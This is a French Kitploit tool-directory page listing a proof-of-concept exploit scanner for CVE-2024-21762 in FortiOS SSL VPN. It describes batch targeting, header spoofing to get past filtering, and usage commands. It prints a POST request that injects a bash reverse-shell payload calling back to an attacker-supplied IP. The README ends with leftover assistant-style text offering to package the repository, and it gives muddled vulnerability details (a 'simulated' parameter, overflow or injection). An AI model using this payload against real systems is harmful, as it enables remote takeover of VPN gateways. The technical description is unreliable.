Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21762_FortiNet_PoC — Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de payload de shell inversé. | Kitploit
Outils/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de payload de shell inversé.

Voir le dépôt
213il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21762_FortiNet_PoC

Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de reverse shell.

Voici une fiche technique de style GitHub pour votre projet, incluant un résumé clair et concis, un guide d'utilisation et le contexte de sa pertinence avec la CVE.


🔥 Titre du projet : CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 Résumé (pour la ligne de description GitHub) :

Scanner de preuve de concept ciblant CVE-2024-21762 dans le point de terminaison /remote/hostcheck_validate du VPN SSL FortiOS avec livraison de reverse shell.


📜 Présentation

Ce script Python est un outil de preuve de concept (PoC) conçu pour interagir avec l'interface VPN SSL FortiOS de Fortinet, ciblant CVE-2024-21762 — un débordement de tampon basé sur la pile ou une injection de commande dans le point de terminaison /remote/hostcheck_validate.

Avertissement : Ceci est destiné uniquement à des fins éducatives et de tests autorisés.


🧬 Fonctionnement

  • Envoie une requête POST élaborée vers /remote/hostcheck_validate sur une interface VPN SSL FortiGate.
  • Injecte une charge utile de reverse shell bash dans un paramètre vulnérable simulé (host).
  • Utilise des en-têtes falsifiés (User-Agent, Cookie) pour contourner le filtrage superficiel des requêtes de FortiOS.
  • Reçoit et enregistre les réponses du serveur pour évaluer le succès de l'exploitation.
  • Prend en charge les tests uniques ou par lots avec automatisation des fichiers d'entrée/sortie et barres de progression.

🛠️ Fonctionnalités

  • 🧪 Injection de charge utile reverse shell via un champ de formulaire contrôlé
  • 🧾 Capture complète de la réponse HTTP pour analyse (last_response.txt)
  • 📊 Barre de progression pour le suivi en mode unique ou par lots
  • 🗃️ Mode par lots avec prise en charge des fichiers d'entrée et de sortie
  • 🔄 Modulaire et extensible

⚙️ Prérequis

  • Python 3.6+
  • tqdm pour la visualisation de la progression

Installer les dépendances :

pip install tqdm

🚀 Utilisation

Mode cible unique

python3 exploit.py --target 192.168.1.1:443 --callback-ip VOTRE_IP --callback-port 8080

Mode par lots

python3 exploit.py --input targets.txt --output results.txt --callback-ip VOTRE_IP --callback-port 8080
  • targets.txt : Liste des cibles au format IP:PORT, une par ligne
  • results.txt : Journal de sortie des tentatives d'exploitation

📥 Exemple de charge utile envoyée

POST /remote/hostcheck_validate HTTP/1.1
Host: [cible]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[ip-de-rappel]/[port-de-rappel] 0>&1'&...

🔍 Journaux

L'outil écrit la réponse HTTP complète de chaque tentative dans :

last_response.txt

Utilisez ce fichier pour vérifier si la requête a été analysée, rejetée, ou si un code d'erreur a été renvoyé.


⚠️ Légal

Ce code est fourni uniquement à des fins éducatives et de tests autorisés. Ne l'utilisez pas sur des réseaux ou systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.


✍️ Auteur

Carter — Ingénieur en cybersécurité, passionné d'équipes Rouge/Violet, amateur d'automatisation de PoC.


Souhaitez-vous que ceci soit empaqueté dans un fichier README.md + une structure de dépôt prête à être poussée sur GitHub ? Je peux générer cela ensuite.

Télécharger l’outil